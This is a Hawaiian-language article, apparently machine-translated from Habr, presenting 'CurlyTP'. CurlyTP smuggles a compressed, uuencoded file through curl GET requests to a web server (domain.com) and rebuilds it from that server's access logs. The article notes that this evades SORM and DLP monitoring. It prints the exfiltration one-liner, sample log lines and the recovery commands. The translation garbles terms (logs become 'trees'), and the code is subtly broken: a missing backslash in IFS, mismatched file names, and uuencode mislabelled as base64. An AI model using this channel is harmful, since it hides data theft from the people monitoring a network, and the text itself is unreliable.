Wahi a ka wehewehe Wikipedia, ʻo kahi hāʻule make he mea hana kipi e lawelawe ana e hoʻololi i ka ʻike a i ʻole kekahi mau mea ma waena o nā poʻe e hoʻohana ana i kahi wahi huna. ʻO ka manaʻo, ʻaʻole hui nā kānaka - akā hoʻololi lākou i ka ʻike e mālama i ka palekana o ka hana.

ʻAʻole pono ka wahi peʻe e huki i ka nānā. No laila, ma ka honua paheʻe ke hoʻohana pinepine nei lākou i nā mea naʻauao: kahi pōhaku lepo ma ka paia, kahi puke waihona puke, a i ʻole kahi lua i ka lāʻau.

Nui nā mea hana hoʻopunipuni a me ka anonymization ma ka Pūnaewele, akā ʻo ka ʻoiaʻiʻo o ka hoʻohana ʻana i kēia mau mea hana e huki i ka nānā. Eia kekahi, hiki ke ālai ʻia lākou ma ka pae ʻoihana a aupuni paha. He aha ka hana?

Hāʻawi ka mea hoʻomohala ʻo Ryan Flowers i kahi koho hoihoi - e hoʻohana i kekahi kikowaena pūnaewele i wahi huna. Inā noʻonoʻo ʻoe, he aha ka hana a kahi kikowaena pūnaewele? Loaʻa i nā noi, hoʻopuka i nā faila a kākau i nā moʻolelo. A hoʻopaʻa inoa i nā noi a pau, ʻo nā mea hewa ʻole!

ʻIke ʻia ʻo kēlā me kēia kikowaena pūnaewele hiki iā ʻoe ke mālama i kahi memo i loko o ka log. Ua noʻonoʻo nā pua pehea e hoʻohana ai i kēia.

Hāʻawi ʻo ia i kēia koho:

1. E lawe i kahi faila kikokikona (memo huna) a helu i ka hash (md5sum).
2. Hoʻopili mākou iā ia (gzip+uuencode).
3. Kākau mākou i ka log me ka hoʻohana ʻana i kahi noi i kuhi hewa ʻole i ke kikowaena.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

No ka heluhelu ʻana i kahi faila, pono ʻoe e hana i kēia mau hana ma ke ʻano hoʻohuli: decode a unzip i ka faila, e nānā i ka hash (hiki ke hoʻouna ʻia ka hash ma luna o nā kahawai hāmama).

Ua pani ʻia nā hakahaka me =+=no laila ʻaʻohe hakahaka o ka helu wahi. ʻO ka papahana, i kapa ʻia e ka mea kākau ʻo CurlyTP, hoʻohana i ka hoʻopāpā base64, e like me nā leka uila. Hana ʻia ka noi me kahi huaʻōlelo ?transfer?i hiki ai i ka mea loaa ke loaa ma na laau.

He aha kā mākou e ʻike ai ma nā lāʻau i kēia hihia?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

E like me ka mea i haʻi mua ʻia, no ka loaʻa ʻana o kahi leka huna pono ʻoe e hana i nā hana ma ke ʻano hoʻohuli:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

He maʻalahi ke kaʻina hana. Md5sum nā pāʻani, a ua hōʻoia nā mea i loko o ka faila ua hoʻololi pololei ʻia nā mea a pau.

He maʻalahi loa ke ʻano. "ʻO ke kumu o kēia hoʻomaʻamaʻa ʻana ʻo ia wale nō ka hōʻoia ʻana e hiki ke hoʻololi ʻia nā faila ma o nā noi pūnaewele liʻiliʻi hewa ʻole, a hana ia ma nā kikowaena pūnaewele me nā moʻolelo maʻalahi. ʻO ka mea nui, he wahi peʻe kēlā me kēia kikowaena pūnaewele!" kākau ʻo Flowers.

ʻOiaʻiʻo, hana wale ke ala inā loaʻa ka mea loaʻa i nā log server. Akā hāʻawi ʻia kēlā ʻano komo, no ka laʻana, e nā hosters he nui.

Pehea e hoʻohana ai?

Ua ʻōlelo ʻo Ryan Flowers ʻaʻole ʻo ia he loea palekana ʻike a ʻaʻole ia e hōʻuluʻulu i kahi papa inoa o nā mea hiki ke hoʻohana no CurlyTP. No ia, he hōʻoia wale nō ia o ka manaʻo e hiki ke hoʻohana ʻia nā mea hana maʻamau a mākou e ʻike nei i kēlā me kēia lā ma ke ʻano kuʻuna ʻole.

ʻO kaʻoiaʻiʻo, he nui nā mea maikaʻi o kēia ʻano ma mua o nā kikowaena "huna" like Kikohoʻe Make Drop ai ole ia, PirateBox: ʻaʻole ia e koi i ka hoʻonohonoho kūikawā ma ka ʻaoʻao kikowaena a i ʻole nā ​​protocol kūikawā - a ʻaʻole ia e hoʻāla i ka kānalua i waena o ka poʻe e nānā ana i ke kaʻa. ʻAʻole paha e nānā kahi ʻōnaehana SORM a i ʻole DLP i nā URL no nā faila kikokikona i hoʻopaʻa ʻia.

ʻO kēia kekahi o nā ala e hoʻouna ai i nā leka ma o nā faila lawelawe. Hiki iā ʻoe ke hoʻomanaʻo i ka hoʻonohonoho ʻana o kekahi mau ʻoihana holomua Nā Hana Hoʻomohala ma HTTP Headers a i ʻole ma ke code o nā ʻaoʻao HTML.

ʻO ka manaʻo, ʻo nā mea hoʻomohala pūnaewele wale nō e ʻike i kēia hua manu Easter, ʻoiai ʻaʻole nānā ke kanaka maʻamau i nā poʻo a i ʻole HTML code.

Source: www.habr.com